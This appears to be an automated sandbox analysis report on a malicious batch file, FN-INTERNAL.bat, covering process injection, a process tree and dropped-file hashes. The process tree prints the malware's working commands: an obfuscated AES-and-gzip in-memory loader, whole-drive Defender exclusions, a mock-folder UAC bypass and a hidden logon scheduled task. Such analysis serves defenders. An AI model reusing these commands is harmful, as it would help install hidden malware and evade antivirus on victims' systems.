SeShutdownPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeSystemEnvironmentPrivilege 3264 powershell.exe Token: SeRemoteShutdownPrivilege 3264 powershell.exe Token: SeUndockPrivilege 3264 powershell.exe Token: SeManageVolumePrivilege 3264 powershell.exe Token: 33 3264 powershell.exe Token: 34 3264 powershell.exe Token: 35 3264 powershell.exe Token: 36 3264 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeIncreaseQuotaPrivilege 2068 powershell.exe Token: SeSecurityPrivilege 2068 powershell.exe Token: SeTakeOwnershipPrivilege 2068 powershell.exe Token: SeLoadDriverPrivilege 2068 powershell.exe Token: SeSystemProfilePrivilege 2068 powershell.exe Token: SeSystemtimePrivilege 2068 powershell.exe Token: SeProfSingleProcessPrivilege 2068 powershell.exe Token: SeIncBasePriorityPrivilege 2068 powershell.exe Token: SeCreatePagefilePrivilege 2068 powershell.exe Token: SeBackupPrivilege 2068 powershell.exe Token: SeRestorePrivilege 2068 powershell.exe Token: SeShutdownPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeSystemEnvironmentPrivilege 2068 powershell.exe Token: SeRemoteShutdownPrivilege 2068 powershell.exe Token: SeUndockPrivilege 2068 powershell.exe Token: SeManageVolumePrivilege 2068 powershell.exe Token: 33 2068 powershell.exe Token: 34 2068 powershell.exe Token: 35 2068 powershell.exe Token: 36 2068 powershell.exe Token: SeIncreaseQuotaPrivilege 2068 powershell.exe Token: SeSecurityPrivilege 2068 powershell.exe Token: SeTakeOwnershipPrivilege 2068 powershell.exe Token: SeLoadDriverPrivilege 2068 powershell.exe Token: SeSystemProfilePrivilege 2068 powershell.exe Token: SeSystemtimePrivilege 2068 powershell.exe Token: SeProfSingleProcessPrivilege 2068 powershell.exe Token: SeIncBasePriorityPrivilege 2068 powershell.exe Token: SeCreatePagefilePrivilege 2068 powershell.exe Token: SeBackupPrivilege 2068 powershell.exe Token: SeRestorePrivilege 2068 powershell.exe Token: SeShutdownPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeSystemEnvironmentPrivilege 2068 powershell.exe Token: SeRemoteShutdownPrivilege 2068 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3308 Explorer.EXE 3308 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 3308 Explorer.EXE 3308 Explorer.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
Explorer.EXEpid process 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE 3308 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exedescription pid process target process PID 5048 wrote to memory of 3020 5048 cmd.exe cmd.exe PID 5048 wrote to memory of 3020 5048 cmd.exe cmd.exe PID 5048 wrote to memory of 2196 5048 cmd.exe cmd.exe PID 5048 wrote to memory of 2196 5048 cmd.exe cmd.exe PID 5048 wrote to memory of 4568 5048 cmd.exe powershell.exe PID 5048 wrote to memory of 4568 5048 cmd.exe powershell.exe PID 4568 wrote to memory of 3844 4568 powershell.exe powershell.exe PID 4568 wrote to memory of 3844 4568 powershell.exe powershell.exe PID 4568 wrote to memory of 1508 4568 powershell.exe cmd.exe PID 4568 wrote to memory of 1508 4568 powershell.exe cmd.exe PID 1508 wrote to memory of 2964 1508 cmd.exe ComputerDefaults.exe PID 1508 wrote to memory of 2964 1508 cmd.exe ComputerDefaults.exe PID 2964 wrote to memory of 3580 2964 ComputerDefaults.exe cmd.exe PID 2964 wrote to memory of 3580 2964 ComputerDefaults.exe cmd.exe PID 3580 wrote to memory of 4644 3580 cmd.exe cmd.exe PID 3580 wrote to memory of 4644 3580 cmd.exe cmd.exe PID 3580 wrote to memory of 244 3580 cmd.exe cmd.exe PID 3580 wrote to memory of 244 3580 cmd.exe cmd.exe PID 3580 wrote to memory of 1588 3580 cmd.exe powershell.exe PID 3580 wrote to memory of 1588 3580 cmd.exe powershell.exe PID 1588 wrote to memory of 4736 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 4736 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 3124 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 3124 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 3264 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 3264 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 2068 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 2068 1588 powershell.exe powershell.exe PID 1588 wrote to memory of 3308 1588 powershell.exe Explorer.EXE PID 1588 wrote to memory of 1180 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2556 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2532 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1148 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 820 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1736 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1932 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1928 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 544 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1128 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1520 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 924 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1316 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 3872 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1444 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2688 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2288 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2488 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 3864 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1496 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2480 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2672 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1292 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1684 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 3456 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 3060 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1088 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 2264 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1868 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 3440 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1856 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1000 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 3696 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1832 1588 powershell.exe svchost.exe PID 1588 wrote to memory of 1044 1588 powershell.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
PID:820 -
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:440
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵PID:2340
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:1920
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca2⤵PID:772
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca2⤵PID:3084
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3084 -s 9443⤵PID:3140
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:4772
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca2⤵PID:3584
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXxw3e32mpkfkfbh0tznpwwqfw96t0tfx6.mca2⤵PID:3104
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:1544
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2440
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:1704
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:4700
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:2496
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:3640
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:3832
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:1264
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:3724
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2516
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3060
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3308 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵PID:3020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd6⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"7⤵PID:4644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵PID:4644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL')4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4756
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2288
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3452 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 3084 -ip 30842⤵PID:3488
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1012
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD546efc7f5f62e312bdd41ab5626d421f8
SHA18dc17b8166b933f9b6bbb76e1212925709d049c6
SHA2562ccac1bac5815fbdf3c77d0a8d5253244a6f51a8274325bed66505a1ec967db2
SHA512d12aef18beb0e0b0fd84958a24443eec07b3b461ece975b4df7d9801a4606bb399335b9fb427d98370f9c32182d8c983427c5cba2ba6a96f1dd310ec7ab22b18
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
14KB
MD5fff09bd674352adc9238d29ff89e83d8
SHA1b7f94439cffe9f452a4259421d33914b142ec65a
SHA256d68a87333582f1d686233f36a777e0643edc0fd1b3ed0f412fcbeb942b7c4441
SHA5126b101c2ffdf5b7f3a5677952a2bc93645bd03ff78c695810be52cdd39b0c85df6403e1c3de34552d3581991e35ba1688d6df52f3c3c6d4acf3fd4737802b8890
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
1KB
MD54a24cd2f7eea1929ac05a4dc990d3e67
SHA1a5a1ee3e677d7c5991437c8345eaa933ac57294f
SHA2568ab16f36aefdeee67c57653d0ce6ecc5bc7d114597d20de7361ca8a78c222ee6
SHA512a283d3efc7ee602c01751eb46ef258993f3e19eef515aa9cc1c749b1217ea4eb10187573ffab3926e11711b428873222a556125702e2d6e5c3693e588b7a39cc
-
Filesize
1KB
MD5450971c7d1d56547156c1838b2751215
SHA1523174269f399a8a9889d3c186c8d25c1f338725
SHA256087c27dba48abf8e4ca4bdf9de77232610d607a851fc3b6b4e027b8377369eb5
SHA512d8a9cc30f61feeb0b149fa05cdb67cfc7fc939498b1a526b248006b0410e119b79a6ab39a4733da1428a9d88d8da92313f82da8b6cfeafaefe8498c29d3860d4
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
